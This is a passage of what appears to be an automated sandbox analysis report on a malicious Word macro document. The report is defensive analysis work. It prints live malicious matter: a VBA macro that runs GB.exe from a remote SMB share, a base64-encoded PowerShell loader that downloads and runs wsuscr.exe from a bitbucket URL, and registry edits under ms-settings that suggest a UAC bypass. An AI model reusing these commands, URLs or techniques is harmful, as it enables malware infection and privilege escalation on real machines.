                                                            Dec 21, 2023 09:50:33.118021965 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com3.5.24.104A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.118021965 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com3.5.2.232A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.118021965 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com3.5.28.21A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.279392958 CET8.8.8.8192.168.2.220xaaa4No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.279392958 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.279392958 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com52.216.52.49A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.279392958 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com3.5.28.149A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.279392958 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com16.182.68.97A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.279392958 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com52.217.0.67A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.279392958 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com3.5.28.199A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.279392958 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com52.217.14.52A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.279392958 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com16.182.40.89A (IP address)IN (0x0001)false
                                                            Dec 21, 2023 09:50:33.279392958 CET8.8.8.8192.168.2.220xaaa4No error (0)s3-w.us-east-1.amazonaws.com52.216.25.100A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • bitbucket.org

                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.2249164104.192.141.14433560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2023-12-21 08:50:31 UTC195OUTGET /olegovich-007/777/downloads/wsuscr.exe HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.1; en-US) WindowsPowerShell/5.1.14409.1005
                                                            Host: bitbucket.org
                                                            Connection: Keep-Alive
                                                            2023-12-21 08:50:32 UTC4250INHTTP/1.1 302 Found
                                                            server: envoy
                                                            x-usage-quota-remaining: 981674.965
                                                            vary: Accept-Language, Origin
                                                            x-usage-request-cost: 18512.20
                                                            cache-control: max-age=0, no-cache, no-store, must-revalidate, private
                                                            Content-Type: text/html; charset=utf-8
                                                            x-b3-traceid: bf0c8c4366be9620
                                                            x-usage-output-ops: 0
                                                            x-used-mesh: False
                                                            x-dc-location: Micros-3
                                                            content-security-policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org app.pendo.io; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ app.pendo.io cdn.pendo.io pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net app.pendo.io cdn.pendo.io data.pendo.io pendo-io-static.storage.googleapis.com pendo-static-6266914010103808.storage.googleapis.com https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net app.pendo.io data.pendo.io pendo-static-6266914010103808.storage.googleapis.com bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net/ https://d136azpfpnge1l.cloudfront.net/; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Date: Thu, 21 Dec 2023 08:50:32 GMT
                                                            x-usage-user-time: 0.515344
                                                            x-usage-system-time: 0.040022
                                                            location: https://bbuseruploads.s3.amazonaws.com/7ea556d7-c0f5-4b27-9352-362ff0b0d6cb/downloads/2850b0f6-002e-418f-976b-b3b8109850d9/wsuscr.exe?response-content-disposition=attachment%3B%20filename%3D%22wsuscr.exe%22&AWSAccessKeyId=ASIA6KOSE3BNAIJ4MWI5&Signature=FTZ8RV5EOoni3gC3Mrl9%2FYklaEM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEIn%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDGven%2FJb42bohVJSV2QCloazsRjFFml9mJba04RvdwRwIgKgYYi%2F5a3hYiD6wlRu177JuOGeBolD5nF0sXYeBwrHIqpwIIEhAAGgw5ODQ1MjUxMDExNDYiDAuJPSFjW7kSer9iRyqEAl9NFNJ%2FJwMoGXDZoTip7aCYSSSFIhhgfTS%2Fc3eMtqt6rcLiUxKM2nSoyDbsWzPKY0uHX6392%2BQS1ev%2FIpkFwloCnE3qO7WCziWnXbmmVePlh15MTfIjI11Rp5pnaq9dxulK%2FApguvuSnrgMCD%2FXG6tD7OV9DzqLMR%2FjGxfGtPr4c6ibg6Je8MgYf651ENHdfl1hNPrCl338SRZo4i0PZu1KSQeqX7aWtscdsVrARbqmcdpURJ46v5%2FkVYe%2FvJrc0Dx6oVNS5PPt8JwUROuhOBPDKXeeP%2BrhZD8KvvBZHj2FguAJRjSy8nbu6TYy3tqCsxgQ1efZYgrZWzSZg24QKGpXm0agMNj4j6wGOp0BMWK80r3cWpRJnmL0EgSAUjCOtSRO7Bt6F1slSAfB5mdTy7QciPsAVDA1eZlC6ennXSo2G0HtPgqe13GBwFN6YRI5gZr%2BXqJYph1iDvUX%2F7ddwJXkFbh4oVAoZShgRAZOltozkfnyg1LNwSuCTBOanMAPLrxJt6xqnY0kB2LjNYWYNbyVwdkMBpBKtUz5f2cA2gJO2H7jprzGlc4QmA%3D%3D&Expires=1703150432
                                                            expires: Thu, 21 Dec 2023 08:50:32 GMT
                                                            x-served-by: 75862792d71e
                                                            x-envoy-upstream-service-time: 684
                                                            content-language: en
                                                            x-view-name: bitbucket.apps.downloads.views.download_file
                                                            x-b3-spanid: bf0c8c4366be9620
                                                            x-static-version: a44564505899
                                                            x-render-time: 0.6695590019226074
                                                            Connection: close
                                                            x-usage-input-ops: 0
                                                            x-version: a44564505899
                                                            x-request-count: 3981
                                                            x-frame-options: SAMEORIGIN
                                                            X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                            Content-Length: 0


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:09:50:09
                                                            Start date:21/12/2023
                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                            Imagebase:0x13fc20000
                                                            File size:1'423'704 bytes
                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:09:50:11
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:explorer.exe "\\89.23.98.22\LN\"
                                                            Imagebase:0xff2f0000
                                                            File size:3'229'696 bytes
                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:09:50:15
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                            Imagebase:0xff2f0000
                                                            File size:3'229'696 bytes
                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:09:50:21
                                                            Start date:21/12/2023
                                                            Path:\Device\Mup\89.23.98.22\LN\GB.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:\\89.23.98.22\LN\GB.exe
                                                            Imagebase:0x13f040000
                                                            File size:268'800 bytes
                                                            MD5 hash:C3E7CFA2E076C3CA421DDC00496C71B5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:09:50:22
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -Command Stop-Process -Name explorer
                                                            Imagebase:0x13f220000
                                                            File size:443'392 bytes
                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:09:50:22
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:cmd.exe /c res.bat && test2.exe
                                                            Imagebase:0x4a0a0000
                                                            File size:345'088 bytes
                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:09:50:23
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo f "
                                                            Imagebase:0x4a0a0000
                                                            File size:345'088 bytes
                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:09:50:23
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\xcopy.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:xcopy /s test2.exe "C:\Users\user\AppData\Local\Temp\persistent2\test2.exe"
                                                            Imagebase:0xffbb0000
                                                            File size:43'008 bytes
                                                            MD5 hash:20CF8728C55A8743AAC86FB8D30EA898
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:09:50:23
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -Command "[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBEAGUAYwBvAG0AcAByAGUAcwBzAGUAZABCAHkAdABlAEEAcgByAGEAeQAgAHsACgAKACAAIAAgACAAIAAgACAAIABbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0ACgAgACAAIAAgAFAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQBCAHkAUAByAG8AcABlAHIAdAB5AE4AYQBtAGUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJAAoAFQAaAByAG8AdwAoACIALQBiAHkAdABlAEEAcgByAGEAeQAgAGkAcwAgAHIAZQBxAHUAaQByAGUAZAAiACkAKQAKACAAIAAgACAAKQAKACAAIAAgACAAIAAgACAAIABQAHIAbwBjAGUAcwBzACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQAtAFYAZQByAGIAbwBzAGUAIAAiAEcAZQB0AC0ARABlAGMAbwBtAHAAcgBlAHMAcwBlAGQAQgB5AHQAZQBBAHIAcgBhAHkAIgAKACAAIAAgACAAIAAgACAAIAAkAGkAbgBwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABvAHUAdABwAHUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKACAAIAAgACAAIAAgACAAIAAkAGcAegBpAHAAUwB0AHIAZQBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAgACQAaQBuAHAAdQB0ACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABnAHoAaQBwAFMAdAByAGUAYQBtAC4AQwBvAHAAeQBUAG8AKAAgACQAbwB1AHQAcAB1AHQAIAApAAoAIAAgACAAIAAgACAAIAAgACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAaQBuAHAAdQB0AC4AQwBsAG8AcwBlACgAKQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAE8AdQB0AEEAcgByAGEAeQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAkAGIAeQB0AGUATwB1AHQAQQByAHIAYQB5AAoAIAAgACAAIAB9AAoAfQAKAAoAWwBiAHkAdABlAFsAXQBdACAAJABiAHkAdABlAF8AYQByAHIAYQB5ACAAPQAgADMAMQAsADEAMwA5ACwAOAAsADAALAAwACwAMAAsADAALAAwACwANAAsADAALAAxADQAOQAsADEANAA0ACwAMQA5ADMALAAxADEANAAsADEAMwAwACwANAA4ACwAMgAwACwANgA5ACwAMQAyADcALAA0ADEALAA5ADYALAAxADAAOQAsADEAOQA5ACwAMQAzADMALAAxADEALAA1ACwAMQA0ADYALAA5ACwAMwA1ACwAMQA3ADcALAAyACwAMQAyADUALAA5ACwAMQAxADEALAAxADAAMwAsADYANgAsADcALAAxADcAMQAsADEAMgA5ACwANAA2ACwANgA4ACwANwA3ACwAMgA0ADgALAAyADUAMAAsADcAMAAsADEAOAA2ACwAMgAzADkALAA3ADYALAAxADEAOQAsADEAMQAxACwAMQAxADMALAAyADMAMQAsADEANQA4ACwAMgA0ADMALAAxADcANAAsADIAMwAzACwAOQA3ACwAMgAyADQALAAxADQAMAAsADkANAAsADQAOAAsADIAMQA3ACwAMgA0ADIALAAxADMAOAAsADgALAA4ADAALAA4ADQALAAyADIAMAAsADEAMQAzACwANAAwACwAMgAzACwAMQA0ADEALAAyADAAMgAsADEANwAzACwAMgAwADIALAAxADkANgAsADEAOAAxACwAOAAxACwAOQA4ACwANgA2ACwAMwA3ACwAMgAwADQALAAxADcANAAsADkANQAsADEANAAxACwAMgA0ACwAMQA4ADUALAAyADUAMAAsADIAMAAwACwAMgAyADQALAAxADcAMAAsADEANgA5ACwAMQAyADMALAA1ADUALAAxADIALAAxADEAMAAsADEAMwA4ACwAMQAzADcALAAxADgANwAsADEANQAwACwAMgAwADkALAA3ADMALAAyADQANwAsADEAMwA1ACwAMQAxADAALAAyADMALAAzADEALAAxADgANgAsADEANQA2ACwAMgAwACwAMQA3ADUALAAxADMAOAAsADYANgAsADIAMAAwACwAMgAzADEALAAxADQANwAsADIAMAAyACwAMQAwADQALAA4ADYALAAxADIANwAsADIAMQA2ACwAMQAyADUALAAxADYANQAsADkANAAsADkAMgAsADEAOAA0ACwAMwAxACwAMwA4ACwANAAzACwANwA5ACwANAA1ACwAMQA2ADMALAAxADYANgAsADEAMAAyACwAMQA3ADEALAAxADEANQAsADMANQAsADEANQA3ACwAMQAsADYALAAxADYAMwAsADEANgAxACwAMgAzADgALAAyADQAMQAsADIAMAA0ACwAMwAwACwAMQA0ADkALAAzADIALAA0ADAALAAxADUAMQAsADEANgA0ACwAMQA3ADYALAAxADQAMgAsADQALAAyADIALAA0ADEALAAxADkAMAAsADEANQAwACwAMgA0ADYALAAxADQANwAsADEAMgA1ACwAMQAyACwANgAwACwAOAA5ACwAMgA0ADUALAA2ADAALAAyADkALAA2ADEALAA3ADQALAAyADEAMQAsADUAMwAsADEANwA4ACwAMQA4ADgALAAyADQAMAAsADEANgA0ACwAMgA1ADMALAAyADEAMQAsADgAMQAsADEANwAxACwAOQA4ACwANQAyACwANAA5ACwAMQA0ADQALAAxADUAMAAsADIAMQA3ACwAMgA3ACwANAA2ACwAMQAzADIALAA1ADcALAA0ADQALAAxADkAMgAsADYANwAsADEANQAsADYAMgAsADIANAA3ACwAMQA1ADUALAA1ADkALAAzADgALAAxADUANQAsADkANwAsADIANQA0ACwAMQA5ADMALAAxADUANQAsADIAMgA0ACwAMgAxADgALAAxADEANgAsADEAMgAzACwAMQA5ADEALAAyADMANwAsADEAMQA3ACwAOQAyACwAMQAyADYALAAxADYAMwAsADEAMgA0ACwANQA4ACwAMgA0ADAALAAyADcALAAxADcAMAAsADEANAA3ACwAMgAyADEALAA3ADEALAAxADMAMAAsADEAMwAyACwANwA4ACwAMQA3ADgALAAzACwAMQAxADMALAA2ADkALAA5ACwAMQA1ACwAMQA1ADgALAA2ADgALAAxADkALAA3ADkALAAxADMAOQAsADUANQAsADUAMQAsADEAMQAxACwAOAA0ACwAOQAwACwAMgAwADUALAAxADIAOAAsADkANgAsADEAOAAxACwAMgA1ACwAMQA3ADAALAAxADAAOAAsADcANgAsADEALAA5ADIALAAxADcAMwAsADkAOQAsADMANgAsADEAMAA5ACwANwA2ACwANgAxACwAMQAzADAALAA3ADUALAA1ADMALAAxADYAMwAsADgAMwAsADkANgAsADcAOQAsADQAMgAsADgAOQAsADEAMwA0ACwANwA3ACwAOQAwACwANQAxACwANQAxACwAMgAwADcALAAxADkAMQAsADIAMwA4ACwAMgA0ACwANQA0ACwANgA3ACwAOAA1ACwAMgAxADgALAAyADUANQAsADIANQAwACwAMgAwADcALAAyADkALAAyADIAMQAsADEAMgAyACwAMgA1ADMALAAzACwANAAsADEANwA4ACwAMgA1ADMALAAxADcANAAsADEANgA0ACwAMQAsADAALAAwAAoAJABkAGUAYwBvAG0AcAByAGUAcwBzAGUAZABCAHkAdABlAEEAcgByAGEAeQAgAD0AIABHAGUAdAAtAEQAZQBjAG8AbQBwAHIAZQBzAHMAZQBkAEIAeQB0AGUAQQByAHIAYQB5ACAALQBiAHkAdABlAEEAcgByAGEAeQAgACQAYgB5AHQAZQBfAGEAcgByAGEAeQAKAAoAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAgACQAZABlAGMAbwBtAHAAcgBlAHMAcwBlAGQAQgB5AHQAZQBBAHIAcgBhAHkAIAApACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApACkAKQAgAHwAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4ACgAKAAoAdwBnAGUAdAAgACIAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwBvAGwAZQBnAG8AdgBpAGMAaAAtADAAMAA3AC8ANwA3ADcALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHcAcwB1AHMAYwByAC4AZQB4AGUAIgAgAC0AbwB1AHQAZgBpAGwAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAB3AHMAdQBzAGMAcgAuAGUAeABlACIACgBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAEMAbwBtAG0AYQBuAGQAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAdwBzAHUAcwBjAHIALgBlAHgAZQAiAA==')) | Invoke-Expression"
                                                            Imagebase:0x13f220000
                                                            File size:443'392 bytes
                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:09:50:24
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\.omg\Shell\Open\command /d C:\Users\ADMINI~1\AppData\Local\Temp\persistent2\test2.exe /f
                                                            Imagebase:0xffe40000
                                                            File size:74'752 bytes
                                                            MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:09:50:24
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\reg.exe" add HKCU\Software\Classes\ms-settings\CurVer /d .omg /f
                                                            Imagebase:0xffc60000
                                                            File size:74'752 bytes
                                                            MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:14
                                                            Start time:09:50:25
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\explorer.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:explorer.exe
                                                            Imagebase:0xff2f0000
                                                            File size:3'229'696 bytes
                                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:17
                                                            Start time:09:50:29
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\.omg\ /f
                                                            Imagebase:0xff850000
                                                            File size:74'752 bytes
                                                            MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:18
                                                            Start time:09:50:29
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\ms-settings\ /f
                                                            Imagebase:0xffd90000
                                                            File size:74'752 bytes
                                                            MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            General

                                                            Target ID:19
                                                            Start time:09:50:36
                                                            Start date:21/12/2023
                                                            Path:C:\Windows\System32\rundll32.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                            Imagebase:0xff5e0000
                                                            File size:45'568 bytes
                                                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Disassembly

                                                            Code Analysis

                                                            Call Graph

                                                            • Entrypoint
                                                            • Decryption Function
                                                            • Executed
                                                            • Not Executed
                                                            • Show Help
                                                            callgraph 2 kjhkjhkd 12 Document_Open Shell:1,vbNormalFocus:1 39 RunExecutable Shell:2,vbNormalFocus:1,vbHide:1 12->39

                                                            Module: NewMacros

                                                            Declaration
                                                            LineContent
                                                            1

                                                            Attribute VB_Name = "NewMacros"

                                                            Non-Executed Functions

                                                            Subroutine

                                                            kjhkjhkdAPIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

                                                            LineInstructionMeta Information
                                                            2

                                                            Sub kjhkjhkd()

                                                            8

                                                            End Sub

                                                            Module: ThisDocument

                                                            Declaration
                                                            LineContent
                                                            1

                                                            Attribute VB_Name = "ThisDocument"

                                                            2

                                                            Attribute VB_Base = "1Normal.ThisDocument"

                                                            3

                                                            Attribute VB_GlobalNameSpace = False

                                                            4

                                                            Attribute VB_Creatable = False

                                                            5

                                                            Attribute VB_PredeclaredId = True

                                                            6

                                                            Attribute VB_Exposed = True

                                                            7

                                                            Attribute VB_TemplateDerived = True

                                                            8

                                                            Attribute VB_Customizable = True

                                                            Executed Functions

                                                            Subroutine

                                                            RunExecutableAPIs: 4, Strings: 4, Number of lines: 8, Relevance: 26.008

                                                            APIsMeta Information

                                                            Shell

                                                            		Shell(""\\89.23.98.22\LN\GB.exe"",1) -> 3444

                                                            vbNormalFocus

                                                            Shell

                                                            		Shell("powershell.exe -Command Stop-Process -Name explorer",0) -> 3476

                                                            vbHide

                                                            StringsDecrypted Strings
                                                            "\\89.23.98.22\LN\"
                                                            "GB.exe"
                                                            """"
                                                            "powershell.exe -Command Stop-Process -Name explorer"
                                                            LineInstructionMeta Information
                                                            24

                                                            Sub RunExecutable()

                                                            25

                                                            Dim FASFASFHBNVNVB as String

                                                            executed
                                                            26

                                                            Dim ireowrppqwcxva as String

                                                            29

                                                            FASFASFHBNVNVB = "\\89.23.98.22\LN\"

                                                            30

                                                            ireowrppqwcxva = "GB.exe"

                                                            33

                                                            Call Shell("""" & FASFASFHBNVNVB & ireowrppqwcxva & """", vbNormalFocus)

                                                            Shell(""\\89.23.98.22\LN\GB.exe"",1) -> 3444

                                                            vbNormalFocus

                                                            executed
                                                            34

                                                            Call Shell("powershell.exe -Command Stop-Process -Name explorer", vbHide)

                                                            Shell("powershell.exe -Command Stop-Process -Name explorer",0) -> 3476

                                                            vbHide

                                                            executed
                                                            35

                                                            End Sub

